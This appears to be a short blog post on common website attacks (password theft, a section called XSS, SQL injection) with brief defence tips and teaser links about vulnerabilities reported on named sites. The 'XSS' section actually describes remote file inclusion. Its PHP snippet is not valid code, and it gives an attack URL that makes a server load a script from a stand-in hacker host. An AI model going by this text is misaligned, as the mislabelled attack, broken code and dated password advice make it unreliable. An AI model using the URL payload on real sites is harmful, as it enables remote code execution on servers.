Here are the most common techniques used to hack a website

Hacking sites that are least protected by password – By pass authentication

It’s the webmaster’s nightmare, hackers accessing the site using stolen passwords which should be under control. Usually hackers will be well known persons who they know. They use various techniques to steal the password. They access their emails; they use key loggers or network sniffers to identify the password which they use for their day to day work.

Hackers can also use techniques such as brute force attack (dictionary attacks) etc and can find the weak passwords. The more the complex password, the more difficult for hackers to identify the password using this method.

How to defend

  • It’s advised to have the passwords made of capital letters, small letters, numbers and symbols and should be at least 6-10 digits long.
  • Change the passwords at frequent interval
  • Don’t store the passwords in email
  • Use the latest antivirus software to make sure that the system is free of key loggers

XSS or the cross site scripting

In this method hacker again access to your website using previously disclosed or undisclosed security vulnerability of the server software or the scripting language. Hackers try to execute a code hosted on a remote computer and will access the secure areas of the websites.

For example in Apache/ php if you try to include a page like this

#include $_GET[page];

And use the get request to include aboutus.php like this http://yoursite.php/?page=aboutus. Hackers can execute remotely hosted page like this http://yoursiite.com/?page=http://hackerssite.com/directorylist.php

This method is the simplest and many variations of the following the methods are there, like using intercepting JavaScript and execute XSS attacks. Now a day it’s too common as the webmasters more towards web2.0 techniques and using loosely coded AJAX techniques.

Read more at http://en.wikipedia.org/wiki/Cross-site_scripting

How to defend

  • Aware of the XSS attacks happening around
  • Update the web server software and server scripting language
  • Disable unwanted service from server software

SQL injection

In this type of attack, hackers take advantage of the comprised database. Hackers inject carefully written SQL codes through the forms available on the website. [registration, feedback form etc]. read more about these type of attach here

http://www.unixwiz.net/techtips/sql-injection.html

http://en.wikipedia.org/wiki/SQL_injection

Ways to protect

  • Clean up the inputs before inserting to the database
  • Properly escape input strings

Explore More

Malaysia mymasjid.net.my’s Web Vulnerability, MySQL Injection

PlanetCreator has reported another critical MySQL Injection (vulnerability) on www.mymasjid.net.my This vulnerability has been alerted to :- Webmaster : [email protected] Applications: ———— PlanetCreator’s_Universal_Advanced_Internet_Securi ty_T00L System Time: ———— (UTC+08:00) Kuala Lumpur,

Critical XSS Vulnerability in http://shwephonecard.com registered parent company is “MMM Network L.L.C.”

PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical XSS vulnerability on http://www.shwephonecard.com  registered parent company is “MMM Network L.L.C.” These are some information from Vulneral Site http://www.shwephonecard.com:

EU Police learning hacking tricks. They are about to “Remote search” your PCs.

Law enforcement at European Union is working on ethical hacking proposal that will allow them to remotely access and monitor any PC without warrant. This is adopted after a decision